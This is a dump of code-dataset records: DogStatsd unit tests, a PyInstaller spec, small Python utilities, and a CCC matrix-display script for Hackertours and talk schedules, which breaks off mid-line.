dogstatsd = DogStatsd(telemetry_min_flush_interval=0, disable_buffering=True)\n dogstatsd.socket = fake_socket\n\n with dogstatsd:\n dogstatsd.gauge('page.views', 123)\n dogstatsd.timing('timer', 123)\n\n dogstatsd.gauge('newpage.views', 123)\n dogstatsd.timing('newtimer', 123)\n\n metric1 = \"page.views:123|g\"\n metric2 = \"timer:123|ms\"\n metric3 = \"newpage.views:123|g\"\n metric4 = \"newtimer:123|ms\"\n\n metrics1 = '\\n'.join([metric1, metric2]) + \"\\n\"\n self.assertEqual(metrics1, fake_socket.recv(no_wait=True))\n\n metrics_packet1 = telemetry_metrics(metrics=2, bytes_sent=len(metrics1), packets_sent=1)\n self.assertEqual(metrics_packet1, fake_socket.recv(no_wait=True))\n\n metrics2 = '\\n'.join([metric3]) + \"\\n\"\n metrics_packet2 = telemetry_metrics(metrics=1, bytes_sent=len(metrics_packet1 + metrics2), packets_sent=2)\n self.assertEqual(metrics2, fake_socket.recv())\n self.assertEqual(metrics_packet2, fake_socket.recv(no_wait=True))\n\n metrics3 = '\\n'.join([metric4]) + \"\\n\"\n metrics_packet3 = telemetry_metrics(metrics=1, bytes_sent=len(metrics_packet2 + metrics3), packets_sent=2)\n self.assertEqual(metrics3, fake_socket.recv())\n self.assertEqual(metrics_packet3, fake_socket.recv(no_wait=True))\n\n def test_batched_buffer_autoflush(self):\n fake_socket = FakeSocket()\n bytes_sent = 0\n with DogStatsd(telemetry_min_flush_interval=0, disable_buffering=False) as dogstatsd:\n dogstatsd.socket = fake_socket\n\n self.assertEqual(dogstatsd._max_payload_size, UDP_OPTIMAL_PAYLOAD_LENGTH)\n\n single_metric = 'mycounter:1|c\\n'\n metrics_per_packet = dogstatsd._max_payload_size // len(single_metric)\n for _ in range(metrics_per_packet + 1):\n dogstatsd.increment('mycounter')\n payload = ''.join([single_metric for _ in range(metrics_per_packet)])\n\n telemetry = telemetry_metrics(\n metrics=metrics_per_packet+1,\n bytes_sent=len(payload),\n )\n bytes_sent += len(payload) + len(telemetry)\n self.assertEqual(payload, fake_socket.recv())\n self.assertEqual(telemetry, fake_socket.recv())\n\n self.assertEqual(single_metric, fake_socket.recv())\n\n telemetry = telemetry_metrics(metrics=0, packets_sent=2, bytes_sent=len(single_metric) + len(telemetry))\n self.assertEqual(telemetry, fake_socket.recv())\n\n def test_module_level_instance(self):\n self.assertTrue(isinstance(statsd, DogStatsd))\n\n def test_instantiating_does_not_connect(self):\n dogpound = DogStatsd()\n self.assertIsNone(dogpound.socket)\n\n def test_accessing_socket_opens_socket(self):\n dogpound = DogStatsd()\n try:\n self.assertIsNotNone(dogpound.get_socket())\n finally:\n dogpound.socket.close()\n\n def test_accessing_socket_multiple_times_returns_same_socket(self):\n dogpound = DogStatsd()\n fresh_socket = FakeSocket()\n dogpound.socket = fresh_socket\n self.assertEqual(fresh_socket, dogpound.get_socket())\n self.assertNotEqual(FakeSocket(), dogpound.get_socket())\n\n def test_tags_from_environment(self):\n with preserve_environment_variable('DATADOG_TAGS'):\n os.environ['DATADOG_TAGS'] = 'country:china,age:45,blue'\n dogstatsd = DogStatsd(telemetry_min_flush_interval=0)\n dogstatsd.socket = FakeSocket()\n dogstatsd.gauge('gt', 123.4)\n metric = 'gt:123.4|g|#country:china,age:45,blue\\n'\n self.assertEqual(metric, dogstatsd.socket.recv())\n self.assertEqual(telemetry_metrics(tags=\"country:china,age:45,blue\", bytes_sent=len(metric)), dogstatsd.socket.recv())\n\n def test_tags_from_environment_and_constant(self):\n with preserve_environment_variable('DATADOG_TAGS'):\n os.environ['DATADOG_TAGS'] = 
'country:china,age:45,blue'\n dogstatsd = DogStatsd(constant_tags=['country:canada', 'red'], telemetry_min_flush_interval=0)\n dogstatsd.socket = FakeSocket()\n dogstatsd.gauge('gt', 123.4)\n tags = \"country:canada,red,country:china,age:45,blue\"\n metric = 'gt:123.4|g|#' + tags + '\\n'\n self.assertEqual(metric, dogstatsd.socket.recv())\n self.assertEqual(telemetry_metrics(tags=tags, bytes_sent=len(metric)), dogstatsd.socket.recv())\n\n def test_entity_tag_from_environment(self):\n with preserve_environment_variable('DD_ENTITY_ID'):\n os.environ['DD_ENTITY_ID'] = '04652bb7-19b7-11e9-9cc6-42010a9c016d'\n dogstatsd = DogStatsd(telemetry_min_flush_interval=0)\n dogstatsd.socket = FakeSocket()\n dogstatsd.gauge('gt', 123.4)\n metric = 'gt:123.4|g|#dd.internal.entity_id:04652bb7-19b7-11e9-9cc6-42010a9c016d\\n'\n self.assertEqual(metric, dogstatsd.socket.recv())\n self.assertEqual(\n telemetry_metrics(tags=\"dd.internal.entity_id:04652bb7-19b7-11e9-9cc6-42010a9c016d\", bytes_sent=len(metric)),\n dogstatsd.socket.recv())\n\n def test_entity_tag_from_environment_and_constant(self):\n with preserve_environment_variable('DD_ENTITY_ID'):\n os.environ['DD_ENTITY_ID'] = '04652bb7-19b7-11e9-9cc6-42010a9c016d'\n dogstatsd = DogStatsd(constant_tags=['country:canada', 'red'], telemetry_min_flush_interval=0)\n dogstatsd.socket = FakeSocket()\n dogstatsd.gauge('gt', 123.4)\n metric = 'gt:123.4|g|#country:canada,red,dd.internal.entity_id:04652bb7-19b7-11e9-9cc6-42010a9c016d\\n'\n self.assertEqual(metric, dogstatsd.socket.recv())\n self.assertEqual(\n telemetry_metrics(tags=\"country:canada,red,dd.internal.entity_id:04652bb7-19b7-11e9-9cc6-42010a9c016d\",\n bytes_sent=len(metric)),\n dogstatsd.socket.recv()\n )\n\n def test_entity_tag_and_tags_from_environment_and_constant(self):\n with preserve_environment_variable('DATADOG_TAGS'):\n os.environ['DATADOG_TAGS'] = 'country:china,age:45,blue'\n with preserve_environment_variable('DD_ENTITY_ID'):\n os.environ['DD_ENTITY_ID'] = '04652bb7-19b7-11e9-9cc6-42010a9c016d'\n dogstatsd = DogStatsd(constant_tags=['country:canada', 'red'], telemetry_min_flush_interval=0)\n dogstatsd.socket = FakeSocket()\n dogstatsd.gauge('gt', 123.4)\n tags = \"country:canada,red,country:china,age:45,blue,dd.internal.entity_id:04652bb7-19b7-11e9-9cc6-42010a9c016d\"\n metric = 'gt:123.4|g|#' + tags + '\\n'\n self.assertEqual(metric, dogstatsd.socket.recv())\n self.assertEqual(telemetry_metrics(tags=tags, bytes_sent=len(metric)), dogstatsd.socket.recv())\n\n def test_dogstatsd_initialization_with_dd_env_service_version(self):\n \"\"\"\n Dogstatsd should automatically use DD_ENV, DD_SERVICE, and DD_VERSION (if present)\n to set {env, service, version} as global tags for all metrics emitted.\n \"\"\"\n cases = [\n # Test various permutations of setting DD_* env vars, as well as other global tag configuration.\n # An empty string signifies that the env var either isn't set or that it is explicitly set to empty string.\n ('', '', '', '', [], []),\n ('prod', '', '', '', [], ['env:prod']),\n ('prod', 'dog', '', '', [], ['env:prod', 'service:dog']),\n ('prod', 'dog', 'abc123', '', [], ['env:prod', 'service:dog', 'version:abc123']),\n ('prod', 'dog', 'abc123', 'env:prod,type:app', [], ['env:prod', 'env:prod', 'service:dog', 'type:app', 'version:abc123']),\n ('prod', 'dog', 'abc123', 'env:prod2,type:app', [], ['env:prod', 'env:prod2', 'service:dog', 'type:app', 'version:abc123']),\n ('prod', 'dog', 'abc123', '', ['env:prod', 'type:app'], ['env:prod', 'env:prod', 'service:dog', 'type:app', 
'version:abc123']),\n ('prod', 'dog', 'abc123', '', ['env:prod2', 'type:app'], ['env:prod', 'env:prod2', 'service:dog', 'type:app', 'version:abc123']),\n ('prod', 'dog', 'abc123', 'env:prod3,custom_tag:cat', ['env:prod2', 'type:app'], ['custom_tag:cat', 'env:prod', 'env:prod2', 'env:prod3', 'service:dog', 'type:app', 'version:abc123']),\n ]\n for case in cases:\n dd_env, dd_service, dd_version, datadog_tags, constant_tags, global_tags = case\n with EnvVars(\n env_vars={\n 'DATADOG_TAGS': datadog_tags,\n 'DD_ENV': dd_env,\n 'DD_SERVICE': dd_service,\n 'DD_VERSION': dd_version,\n }\n ):\n dogstatsd = DogStatsd(constant_tags=constant_tags, telemetry_min_flush_interval=0)\n dogstatsd.socket = FakeSocket()\n\n # Guarantee consistent ordering, regardless of insertion order.\n dogstatsd.constant_tags.sort()\n self.assertEqual(global_tags, dogstatsd.constant_tags)\n\n # Make call with no tags passed; only the globally configured tags will be used.\n global_tags_str = ','.join([t for t in global_tags])\n dogstatsd.gauge('gt', 123.4)\n dogstatsd.flush()\n\n # Protect against the no tags case.\n metric = 'gt:123.4|g|#{}\\n'.format(global_tags_str) if global_tags_str else 'gt:123.4|g\\n'\n self.assertEqual(metric, dogstatsd.socket.recv())\n self.assertEqual(\n telemetry_metrics(\n tags=global_tags_str,\n bytes_sent=len(metric)\n ),\n dogstatsd.socket.recv(),\n )\n dogstatsd._reset_telemetry()\n\n # Make another call with local tags passed.\n passed_tags = ['env:prod', 'version:def456', 'custom_tag:toad']\n all_tags_str = ','.join([t for t in passed_tags + global_tags])\n dogstatsd.gauge('gt', 123.4, tags=passed_tags)\n dogstatsd.flush()\n\n metric = 'gt:123.4|g|#{}\\n'.format(all_tags_str)\n self.assertEqual(metric, dogstatsd.socket.recv())\n self.assertEqual(\n telemetry_metrics(\n tags=global_tags_str,\n bytes_sent=len(metric),\n ),\n dogstatsd.socket.recv(),\n )\n\n def test_default_max_udp_packet_size(self):\n dogstatsd = DogStatsd(disable_buffering=False, flush_interval=10000, disable_telemetry=True)\n dogstatsd.socket = FakeSocket()\n\n for _ in range(10000):\n dogstatsd.increment('val')\n\n payload = dogstatsd.socket.recv()\n self.assertIsNotNone(payload)\n while payload is not None:\n payload_size = len(payload)\n self.assertLessEqual(payload_size, UDP_OPTIMAL_PAYLOAD_LENGTH)\n self.assertGreater(payload_size, UDP_OPTIMAL_PAYLOAD_LENGTH - 100)\n\n payload = dogstatsd.socket.recv()\n\n def test_default_max_uds_packet_size(self):\n dogstatsd = DogStatsd(\n disable_buffering=False,\n socket_path=\"fake\",\n flush_interval=10000,\n disable_telemetry=True,\n )\n dogstatsd.socket = FakeSocket()\n\n for _ in range(10000):\n dogstatsd.increment('val')\n\n payload = dogstatsd.socket.recv()\n self.assertIsNotNone(payload)\n while payload is not None:\n payload_size = len(payload)\n self.assertLessEqual(payload_size, UDS_OPTIMAL_PAYLOAD_LENGTH)\n self.assertGreater(payload_size, UDS_OPTIMAL_PAYLOAD_LENGTH - 100)\n\n payload = dogstatsd.socket.recv()\n\n def test_custom_max_packet_size(self):\n dogstatsd = DogStatsd(\n disable_buffering=False,\n max_buffer_len=4000,\n flush_interval=10000,\n disable_telemetry=True,\n )\n dogstatsd.socket = FakeSocket()\n\n for _ in range(10000):\n dogstatsd.increment('val')\n\n payload = dogstatsd.socket.recv()\n self.assertIsNotNone(payload)\n while payload is not None:\n payload_size = len(payload)\n self.assertLessEqual(payload_size, 4000)\n self.assertGreater(payload_size, 3900)\n\n payload = dogstatsd.socket.recv()\n\n def test_gauge_does_not_send_none(self):\n 
self.statsd.gauge('metric', None)\n self.assertIsNone(self.recv())\n\n def test_increment_does_not_send_none(self):\n self.statsd.increment('metric', None)\n self.assertIsNone(self.recv())\n\n def test_decrement_does_not_send_none(self):\n self.statsd.decrement('metric', None)\n self.assertIsNone(self.recv())\n\n def test_timing_does_not_send_none(self):\n self.statsd.timing('metric', None)\n self.assertIsNone(self.recv())\n\n def test_histogram_does_not_send_none(self):\n self.statsd.histogram('metric', None)\n self.assertIsNone(self.recv())\n\n def test_set_with_container_field(self):\n self.statsd._container_id = \"fake-container-id\"\n self.statsd.set(\"set\", 123)\n self.assert_equal_telemetry(\"set:123|s|c:fake-container-id\\n\", self.recv(2))\n self.statsd._container_id = None\n\n def test_gauge_with_container_field(self):\n self.statsd._container_id = \"fake-container-id\"\n self.statsd.gauge(\"gauge\", 123.4)\n self.assert_equal_telemetry(\"gauge:123.4|g|c:fake-container-id\\n\", self.recv(2))\n self.statsd._container_id = None\n\n def test_counter_with_container_field(self):\n self.statsd._container_id = \"fake-container-id\"\n\n self.statsd.increment(\"page.views\")\n self.statsd.flush()\n self.assert_equal_telemetry(\"page.views:1|c|c:fake-container-id\\n\", self.recv(2))\n\n self.statsd._reset_telemetry()\n self.statsd.increment(\"page.views\", 11)\n self.statsd.flush()\n self.assert_equal_telemetry(\"page.views:11|c|c:fake-container-id\\n\", self.recv(2))\n\n self.statsd._reset_telemetry()\n self.statsd.decrement(\"page.views\")\n self.statsd.flush()\n self.assert_equal_telemetry(\"page.views:-1|c|c:fake-container-id\\n\", self.recv(2))\n\n self.statsd._reset_telemetry()\n self.statsd.decrement(\"page.views\", 12)\n self.statsd.flush()\n self.assert_equal_telemetry(\"page.views:-12|c|c:fake-container-id\\n\", self.recv(2))\n\n self.statsd._container_id = None\n\n def test_histogram_with_container_field(self):\n self.statsd._container_id = \"fake-container-id\"\n self.statsd.histogram(\"histo\", 123.4)\n self.assert_equal_telemetry(\"histo:123.4|h|c:fake-container-id\\n\", self.recv(2))\n self.statsd._container_id = None\n\n def test_timing_with_container_field(self):\n self.statsd._container_id = \"fake-container-id\"\n self.statsd.timing(\"t\", 123)\n self.assert_equal_telemetry(\"t:123|ms|c:fake-container-id\\n\", self.recv(2))\n self.statsd._container_id = None\n\n def test_event_with_container_field(self):\n self.statsd._container_id = \"fake-container-id\"\n self.statsd.event(\n \"Title\",\n \"L1\\nL2\",\n priority=\"low\",\n date_happened=1375296969,\n )\n event2 = u\"_e{5,6}:Title|L1\\\\nL2|d:1375296969|p:low|c:fake-container-id\\n\"\n self.assert_equal_telemetry(\n event2,\n self.recv(2),\n telemetry=telemetry_metrics(\n metrics=0,\n events=1,\n bytes_sent=len(event2),\n ),\n )\n\n self.statsd._reset_telemetry()\n\n self.statsd.event(\"Title\", u\"♬ †øU †øU ¥ºu T0µ ♪\", aggregation_key=\"key\", tags=[\"t1\", \"t2:v2\"])\n event3 = u\"_e{5,32}:Title|♬ †øU †øU ¥ºu T0µ ♪|k:key|#t1,t2:v2|c:fake-container-id\\n\"\n self.assert_equal_telemetry(\n event3,\n self.recv(2, reset_wait=True),\n telemetry=telemetry_metrics(\n metrics=0,\n events=1,\n bytes_sent=len(event3),\n ),\n )\n self.statsd._container_id = None\n\n def test_service_check_with_container_field(self):\n self.statsd._container_id = \"fake-container-id\"\n now = int(time.time())\n self.statsd.service_check(\n \"my_check.name\",\n self.statsd.WARNING,\n tags=[\"key1:val1\", \"key2:val2\"],\n timestamp=now,\n 
hostname=u\"i-abcd1234\",\n message=u\"♬ †øU \\n†øU ¥ºu|m: T0µ ♪\",\n )\n check = u'_sc|my_check.name|{0}|d:{1}|h:i-abcd1234|#key1:val1,key2:val2|m:{2}|c:fake-container-id\\n'.format(\n self.statsd.WARNING, now, u'♬ †øU \\\\n†øU ¥ºu|m\\\\: T0µ ♪'\n )\n self.assert_equal_telemetry(\n check,\n self.recv(2),\n telemetry=telemetry_metrics(\n metrics=0,\n service_checks=1,\n bytes_sent=len(check),\n ),\n )\n self.statsd._container_id = None\n\n def test_sender_mode(self):\n statsd = DogStatsd(disable_background_sender=True)\n self.assertIsNone(statsd._queue)\n\n statsd.enable_background_sender()\n self.assertIsNotNone(statsd._queue)\n\n statsd = DogStatsd(disable_background_sender=False)\n self.assertIsNotNone(statsd._queue)\n\n def test_sender_calls_task_done(self):\n statsd = DogStatsd(disable_background_sender=False)\n statsd.socket = OverflownSocket()\n statsd.increment(\"test.metric\")\n statsd.wait_for_pending()\n\n def test_sender_queue_no_timeout(self):\n statsd = DogStatsd(disable_background_sender=False, sender_queue_timeout=None)\n\n def test_set_socket_timeout(self):\n statsd = DogStatsd(disable_background_sender=False)\n statsd.socket = FakeSocket()\n statsd.set_socket_timeout(1)\n self.assertEqual(statsd.socket.timeout, 1)\n self.assertEqual(statsd.socket_timeout, 1)\n","repo_name":"DataDog/datadogpy","sub_path":"tests/unit/dogstatsd/test_statsd.py","file_name":"test_statsd.py","file_ext":"py","file_size_in_byte":71712,"program_lang":"python","lang":"en","doc_type":"code","stars":582,"dataset":"github-code","pt":"31"} +{"seq_id":"7708596501","text":"# -*- mode: python ; coding: utf-8 -*-\n\nblock_cipher = None\n\n\na = Analysis(['order_creator_service.py'],\n pathex=['D:\\\\Projects\\\\Pro_py\\\\excel_order_creator'],\n binaries=[],\n datas=[\n (r'app\\static', r'app\\static'),\n (r'app\\templates', r'app\\templates'),\n (r'config.json', r'config.json'),\n (r'settings_produce.json', r'settings_produce.json'),\n (r'settings_sell.json', r'settings_sell.json'),\n (r'data.sqlite', r'data.sqlite')\n\t\t\t ],\n hiddenimports=[],\n hookspath=[],\n runtime_hooks=[],\n excludes=[],\n win_no_prefer_redirects=False,\n win_private_assemblies=False,\n cipher=block_cipher,\n noarchive=False)\npyz = PYZ(a.pure, a.zipped_data,\n cipher=block_cipher)\nexe = EXE(pyz,\n a.scripts,\n a.binaries,\n a.zipfiles,\n a.datas,\n [],\n name='order_creator_service',\n debug=False,\n bootloader_ignore_signals=False,\n strip=False,\n upx=True,\n upx_exclude=[],\n runtime_tmpdir=None,\n console=True )\n","repo_name":"troubtimehero/excel_order_creator","sub_path":"excel_order_creator/order_creator_service.spec","file_name":"order_creator_service.spec","file_ext":"spec","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70142184732","text":"import math\n\n\nclass GoalDetection:\n def __init__(self, distance_threshold=150):\n self.distance_threshold = distance_threshold\n self.flag = False\n self.count = 0\n\n def check_goal(self, goal_position, ball_position):\n if self.flag:\n return self.flag\n\n (x, y, w, h) = ball_position\n center_ball = int(x + w / 2), int(y + h / 2)\n\n (x, y, w, h) = goal_position\n center_goal = int(x + w / 2), int(y + h / 2)\n\n distance = math.hypot(center_ball[0] - center_goal[0], center_ball[1] - center_goal[1])\n if distance < self.distance_threshold:\n self.count += 1\n if self.count > 6:\n self.flag = True\n\n return 
self.flag\n","repo_name":"mosobhyy/Vision-Stats","sub_path":"goal_detection.py","file_name":"goal_detection.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19354429729","text":"import streamlit as st\nfrom custom_module.custom import *\n\n\ndef ctokelvin():\n st.header(\"KONVERSI SUHU KELVIN\")\n\n st.subheader(\"Celcius Ke Kelvin\")\n\n c = st.number_input(\"Masukkan Suhu (C) :\")\n\n btn_luas = btnhasil(1)\n\n if btn_luas:\n result_luas = c + 273\n\n rumussuhu(\"Suhu\", \"Ke Kelvin\", \"C + 273\")\n\n resultsuhu(\"Suhu\", \"Ke Kelvin\", result_luas)\n\n\ndef kelvintoc():\n st.subheader(\"Kelvin ke Celcius\")\n\n k = st.number_input(\"Masukkan Suhu (K) : \")\n\n btn_keliling = btnhasil(2)\n\n if btn_keliling:\n\n result_keliling = k - 273\n\n rumussuhu(\"Suhu\", \"Ke Celcius\", \"K - 273\")\n\n resultsuhu(\"Suhu\", \"Ke Celcius\", result_keliling)\n\n\ndef kelvin():\n ctokelvin()\n kelvintoc()","repo_name":"tugasbesardaspro/tubesdaspro","sub_path":"components/suhu/kelvin.py","file_name":"kelvin.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6333662085","text":"import os\nimport numpy as np\nfrom PIL import Image\n\ndirname = \"./Data\"\ndirlist = os.listdir(dirname)\nfor index, file in enumerate(dirlist):\n bias = 0\n file_path = os.path.join(dirname, file)\n img = Image.open(file_path).convert(\"L\")\n imageArray = np.array(img) / 255.\n firstNum = imageArray[0][0]\n for row in imageArray:\n for col in row:\n bias = bias + abs(col - firstNum)\n \n if(bias < 20000):\n print(\"NO ---- process {} out of {}\".format(index, len(dirlist)))\n os.remove(file_path)\n else:\n print(\"YES ---- process {} out of {}\".format(index, len(dirlist)))\n \n\n","repo_name":"fish98/TuringDataGenerator","sub_path":"DataGenerate/dataCheck.py","file_name":"dataCheck.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28853075191","text":"import datetime\nimport dateutil.parser\nimport hashlib\nimport json\nimport os\nimport random\nimport time\nimport traceback\n\nfrom pretalx_api import PretalxAPI, ongoing_or_future_filter, max_duration_filter\n\nfrom PIL import Image\nfrom pprint import pprint\nfrom pyfis.aegmis import MIS1MatrixDisplay\nfrom pyfis.aegmis.exceptions import CommunicationError\n\nfrom _config import *\nfrom text_renderer import TextRenderer\nfrom gcm_controller import GCMController\n\n\nDISPLAY_MODES = [\n \"images\",\n \"hackertours\",\n \"pride\",\n \"pretalx\",\n]\n\nTRACK_CODES = {\n \"Sustainability & Climate Justice\": \"CS\",\n \"Hardware & Making\": \"HW\",\n \"Art & Beauty\": \"AB\",\n \"Ethics, Politics & Society\": \"EP\",\n \"CCC\": \"C\",\n \"Entertainment\": \"E\",\n \"Science\": \"S\",\n \"Security\": \"SE\"\n}\n\nROOM_ABBREVIATIONS = {\n \"Chaospat:innen Assembly Space\": \"Chaospatinnen\",\n \"Kidspace - Workshopraum in Saal B\": \"Kidspace Saal B\",\n \"Sendezentrum Podcast-Tisch\": \"Podcast-Tisch\"\n}\n\nTRACK_COLORS = {\n \"CS\": 0xfbc617,\n \"HW\": 0x9d9d9d,\n \"AB\": 0x81c854,\n \"EP\": 0x9d9d9d,\n \"C\": 0xfb48c4,\n \"E\": 0x1a36cd,\n \"S\": 0x9d9d9d,\n \"SE\": 0x3cacd7\n}\n\nGENERIC_PALETTE = [\n 0xff0000,\n 0x00ff00,\n 0x0000ff,\n 0xff0000,\n 0x00ffff,\n 0xff00ff,\n 0xffffff\n]\n\n\n# Pride flag image parser\ndef 
_flag_to_sectors(flag):\n # Takes the middle vertical column of pixels from the image\n # and converts it into a list of 32 colors\n if not isinstance(flag, Image.Image):\n flag = Image.open(flag)\n flag = flag.convert('RGB')\n pixels = flag.load()\n width, height = flag.size\n x = width // 2\n \n # Get colors and height per color\n colors = []\n current_color = pixels[x, 0]\n current_color_height = 0\n for y in range(height):\n color = pixels[x, y]\n current_color_height += 1\n if (color != current_color) or (y == height - 1):\n # Discard color artefacts that are too narrow\n if current_color_height / height > 0.05:\n hex_color = (current_color[0] << 16) | (current_color[1] << 8) | current_color[2]\n colors.append([hex_color, current_color_height])\n current_color = color\n current_color_height = 0\n \n # Limit to 32 colors max.\n colors = colors[:32]\n \n # Adapt heights to 32 sectors\n total_height = sum([color[1] for color in colors])\n for i, (color, height) in enumerate(colors):\n colors[i][1] = round(32 * height / total_height)\n \n # If new heights don't add up to 32, adapt last one\n if sum([color[1] for color in colors]) != 32:\n colors[-1][1] = 32 - sum([color[1] for color in colors[:-1]])\n \n # Turn color list into sector list of 32 colors\n sectors = []\n for color, height in colors:\n sectors.extend([color] * height)\n return sectors\n \n\n\ndef main():\n try:\n mode_index = 0\n mode = DISPLAY_MODES[mode_index]\n page = 1\n secondary_page = 2\n display_width = 3 * 96\n display_height = 64\n page_interval = 20 # Page switch interval in seconds (roughly)\n \n pretalx = PretalxAPI(\"https://fahrplan.events.ccc.de/congress/2023/fahrplan/schedule.json\")\n renderer = TextRenderer(\"../fonts\")\n display = MIS1MatrixDisplay(CONFIG_LCD_PORT, baudrate=115200, use_rts=False, debug=False)\n gcm = GCMController(CONFIG_GCM_PORT, debug=False)\n time.sleep(3)\n gcm.set_high_current(True)\n \n try:\n display.reset()\n except CommunicationError:\n pass\n time.sleep(1)\n display.set_config(\n lcd_module=0,\n num_lcds=3,\n x=0,\n y=0,\n id=1,\n board_timeout=600,\n fr_freq=0,\n fps=0,\n is_master=False,\n protocol_timeout=600,\n response_delay=0\n )\n display.become_master()\n \n last_page_update = 0\n hackertours_boarding = False\n hackertours_last_blink_update = 0\n hackertours_blink_state = False\n while True:\n utcnow = datetime.datetime.utcnow()\n now = datetime.datetime.now()\n \n # Handle all background calculations and data operations\n # Handle green alternating flashing on hackertours boarding\n if hackertours_boarding:\n now_time = time.time()\n if now_time - hackertours_last_blink_update >= 1.0:\n hackertours_blink_state = not hackertours_blink_state\n gcm.clear()\n if hackertours_blink_state:\n for i in range(10):\n gcm.set_sector(i, 0x000000)\n for i in range(10):\n gcm.set_sector(i+22, 0x00FF00)\n else:\n for i in range(10):\n gcm.set_sector(i, 0x00FF00)\n for i in range(10):\n gcm.set_sector(i+22, 0x000000)\n gcm.update()\n hackertours_last_blink_update = now_time\n \n if (time.time() - last_page_update) < page_interval:\n time.sleep(0.1)\n continue\n \n display.delete_page(secondary_page)\n gcm.clear()\n page, secondary_page = secondary_page, page\n print(\"Handling mode: \" + mode)\n \n # Handle displaying the required content\n hackertours_boarding = False\n if mode == \"hackertours\":\n # Load tours from file\n with open(\"/tmp/hackertours.txt\", 'r') as f:\n lines = f.readlines()\n \n tours = []\n for line in lines:\n timestamp = \" \".join(line.split()[:2])\n code = 
line.split()[2]\n destination = \" \".join(line.split()[3:])\n start = datetime.datetime.strptime(timestamp, \"%d.%m.%Y %H:%M\")\n if start >= now:\n tours.append({'start': start, 'code': code, 'destination': destination})\n \n for tour in tours:\n if now >= tour['start'] and now <= (tour['start'] + datetime.timedelta(minutes=15)):\n # This tour is boarding now\n display.fill_area(page, x=0, y=0, width=24, height=64, state=1)\n boarding_img = renderer.render_multiline_text(width=display_width-24, height=display_height, pad_left=0, pad_top=0, font=\"21_DBLCD\", size=0, halign='center', valign='middle', inverted=True, h_spacing=1, v_spacing=3, char_width=None, text=\"Now boarding:\\n\" + tour['destination'], auto_wrap=True, break_words=False)\n display.image(page, 24, 0, boarding_img)\n hackertours_boarding = True\n \n if not hackertours_boarding:\n header_image = renderer.render_text(width=256, height=12, pad_left=0, pad_top=0, font=\"12_DBLCD\", size=0, halign='left', valign='top', inverted=True, spacing=1, char_width=None, text=\"Hackertours\")\n display.image(page, 32, 0, header_image)\n display.fill_area(page, x=0, y=14, width=288, height=1, state=1)\n display.fill_area(page, x=0, y=0, width=24, height=14, state=1)\n gcm.set_sector(0, 0xFF0000)\n gcm.set_sector(1, 0xFF7F00)\n gcm.set_sector(2, 0xFFFF00)\n gcm.set_sector(3, 0x00FF00)\n gcm.set_sector(4, 0x0000FF)\n gcm.set_sector(5, 0x4B0082)\n gcm.set_sector(6, 0x8F00FF)\n \n if tours:\n items = sorted(tours, key=lambda t: t['start'])[:3]\n for i, tour in enumerate(items):\n dep_str = tour['start'].strftime(\"%a %H:%M\")\n y_base = (i + 1) * 16\n line = tour['code']\n # Crudely make lines have repeatable distinct colors\n color_index = sum(hashlib.md5(line.encode('utf8')).digest()) % len(GENERIC_PALETTE)\n for sector in range(8):\n gcm.set_sector(y_base // 2 + sector, GENERIC_PALETTE[color_index])\n line_image = renderer.render_text(width=24, height=16, pad_left=0, pad_top=0, font=\"12_DBLCD\", size=0, halign='center', valign='middle', inverted=False, spacing=1, char_width=None, text=line)\n display.image(page, 0, y_base, line_image)\n dest_image = renderer.render_text(width=152, height=16, pad_left=0, pad_top=0, font=\"12_DBLCD\", size=0, halign='left', valign='middle', inverted=True, spacing=1, char_width=None, text=tour['destination'])\n display.image(page, 32, y_base, dest_image)\n dep_image = renderer.render_text(width=96, height=16, pad_left=0, pad_top=0, font=\"12_DBLCD\", size=0, halign='right', valign='middle', inverted=True, spacing=1, char_width=None, text=dep_str)\n display.image(page, 192, y_base, dep_image)\n else:\n no_dep_img = renderer.render_text(width=display_width-24, height=48, pad_left=0, pad_top=0, font=\"12_DBLCD\", size=0, halign='center', valign='middle', inverted=True, spacing=2, char_width=None, text=\"No Hackertours :(\")\n display.image(page, 24, 16, no_dep_img)\n elif mode == \"pretalx\":\n # Display header\n track_image = renderer.render_text(width=28, height=7, pad_left=0, pad_top=0, font=\"7_DBLCD\", size=0, halign='left', valign='top', inverted=True, spacing=1, char_width=None, text=\"Trck\")\n location_image = renderer.render_text(width=70, height=7, pad_left=0, pad_top=0, font=\"7_DBLCD\", size=0, halign='left', valign='top', inverted=True, spacing=1, char_width=None, text=\"Location\")\n title_image = renderer.render_text(width=32, height=7, pad_left=0, pad_top=0, font=\"7_DBLCD\", size=0, halign='left', valign='top', inverted=True, spacing=1, char_width=None, text=\"Title\")\n time_image = 
renderer.render_text(width=50, height=7, pad_left=0, pad_top=0, font=\"7_DBLCD\", size=0, halign='right', valign='top', inverted=True, spacing=1, char_width=None, text=\"Starts in\")\n display.image(page, 0, 0, track_image)\n display.image(page, 26, 0, location_image)\n display.image(page, 96, 0, title_image)\n display.image(page, 238, 0, time_image)\n display.fill_area(page, x=0, y=8, width=288, height=1, state=1)\n for i in range(5):\n gcm.set_sector(i, 0xffffff)\n\n # Get schedule from pretalx\n events = pretalx.get_all_events()\n\n #tracks = list(set([event['track'] for event in events]))\n #pprint(tracks)\n \n # Filter out all events longer then 2 hours\n events = filter(lambda event: max_duration_filter(event, 2, 0), events)\n \n # Filter out all events that are finished\n events = filter(lambda event: ongoing_or_future_filter(event, max_ongoing=9), events)\n events = list(events)\n\n if events:\n for i, event in enumerate(events[:3]):\n start = dateutil.parser.isoparse(event['date']).replace(tzinfo=None)\n delta = start - now\n seconds = round(delta.total_seconds())\n if seconds < 0:\n time_text = \"{}m ago\".format(round(-seconds / 60))\n elif seconds >= 3600:\n time_text = \"{}h{}m\".format(seconds // 3600, round((seconds % 3600) / 60))\n else:\n time_text = \"{}m\".format(round((seconds % 3600) / 60))\n\n track_code = TRACK_CODES.get(event['track'], (event['track'] or \"/\").upper()[:2])\n track_color = TRACK_COLORS.get(track_code, 0xffffff)\n\n y_base = 12 + i * 16\n for r in range(8):\n gcm.set_sector(y_base // 2 + r, track_color)\n\n track_image = renderer.render_text(width=24, height=16, pad_left=0, pad_top=0, 